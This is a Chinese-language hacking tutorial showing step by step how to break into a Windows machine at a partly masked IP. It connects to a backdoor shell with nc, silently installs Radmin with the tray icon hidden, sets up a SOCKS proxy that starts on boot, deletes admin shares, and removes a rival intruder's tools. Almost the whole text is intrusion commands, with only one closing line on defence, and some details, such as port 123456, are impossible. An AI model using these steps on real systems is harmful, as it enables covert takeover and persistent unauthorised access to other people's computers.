一步一个脚印，学好入侵

核心提示： F:/hack>opentenet //211.217.50.xx blueye$ 1111 1 4567F:/hack>telnet 211.217.50.xx 4567（省略）连接并运行后门程序运行后门程序命令 根目录：inject.exe -run（后门使用方法和安装都在

F:/hack>opentenet //211.217.50.xx blueye$ 1111 1 4567　

F:/hack>telnet 211.217.50.xx 4567　

（省略）

连接并运行后门程序运行后门程序命令 根目录：inject.exe -run　

（后门使用方法和安装都在zip文件里面包含了）　

后门端口123456　

F:/hack>nc 211.217.50.xx 123456　

Welcome To WinEggDropShell Matrix Version　

[Melody]

下面安装radmin，配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章。

radmin.reg　

raddrv.dll　

admdll.dll　

r_server.exe　

把这个4个文件copy c:/winnt/system32　

在目录下面执行命令　

c:/winnt/system32>r_server /s radmin.reg -----导入注册表　

c:/winnt/system32>r_server /install /silence -----安装radmin.并且不显示托盘　

c:/winnt/system32>net start r_server ----- 启动服务　

安装sock代理　

把sksockserver.exe copy c:/winnt/system32　

c:/winnt/system32>sksockserver /install -----安装服务　

c:/winnt/system32>sksockserver -config port 1234 ----端口定在1234 自己可以改　

c:/winnt/system32>sksockserver -config starttype 2 ----开机自动启动　

c:/winnt/system32>net start skserver ----启动服务　

最后删除共享　

net share ipc$ /del　

net share admin$ /del　

在安装radmin的时候你发现有人已经安装了。

看操作 (我输入的内容)　

后门连接　

F:/hack>nc 211.217.50.xx 123456　

Welcome To WinEggDropShell Matrix Version　

[Melody
]#（pslist）　

[Melody
]#(pskill r_server)　

[Melody
]#(shell)　

c:/winnt/system32>(del r_server.exe)　

c:/winnt/system32>(del admdll.dll)　

c:/winnt/system32>(del raddrv.dll)　

copy你自己的上去，然后安装　

省事的办法直接导入注册表，然后重新输入安装命令运行，就可以了，只是在原来默认端口上面架上了密码。

这时，你就会有疑问了！为什么我输入导入注册表命令不管用呢？出现什么regedit不是可运行的程序之类的。

出现这样的情况最简单的解决办法telnet上去导入试试看，还可以先运行radmin 然后在radmin的dos下导入，也是可以的。

防御办法：　

安装rpc补丁，使用防火墙过滤135，445，139等端口。